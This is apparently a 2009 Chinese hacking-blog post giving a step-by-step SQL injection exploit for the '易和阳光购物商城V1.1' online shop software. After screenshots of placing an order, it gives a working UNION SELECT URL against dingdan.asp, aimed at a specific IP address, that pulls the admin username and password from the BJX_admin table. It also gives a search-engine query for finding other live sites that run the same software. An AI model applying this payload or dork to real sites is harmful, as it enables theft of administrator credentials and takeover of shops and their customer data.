« 上一篇下一篇 »

易和阳光购物商城V1.1漏洞

在虚拟机上进行安装测试!打开界面如下[IMG=400,300,title]http://www.hackserver.cn/upload/2009/7/200907051002114452.jpg[/IMG] 也可以再g.cn里面搜索:inurl:product.asp?Iheeoid= 首先注册个用户然后用户下订单 [IMG=400,300,title]http://www.hackserver.cn/upload/2009/7/2.jpg[/IMG] 去收银台 [IMG=400,300,title]http://www.hackserver.cn/upload/2009/7/200907051005241225.jpg[/IMG] 下一步 [IMG=400,300,title]http://www.hackserver.cn/upload/2009/7/200907051007083080.jpg[/IMG] 下一步 [IMG=400,300,title]http://www.hackserver.cn/upload/2009/7/200907051008093463.jpg[/IMG] 完成订单 [IMG=400,300,title]http://www.hackserver.cn/upload/2009/7/200907051008367163.jpg[/IMG] 进入会员中心 [IMG=400,300,title]http://www.hackserver.cn/upload/2009/7/200907051010293570.jpg[/IMG] 我的订单 [IMG=400,300,title]http://www.hackserver.cn/upload/2009/7/200907051011143450.jpg[/IMG] 订单号 [IMG=400,300,title]http://www.hackserver.cn/upload/2009/7/200907051012098725.jpg[/IMG] 浏览IE http://203.171.235.81:1/dingdan.asp?dan=2009423113536'%20and%201=2%20union%20select%201,2,admin,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,password,24,25%20from%20BJX_admin%20where%20'1'='1 备注:2009423113536这个修改成你的订单号易和阳光购物商城V1.1 下载地址:http://hackserver.cn/back/易和阳光购物商城 v1.1.rar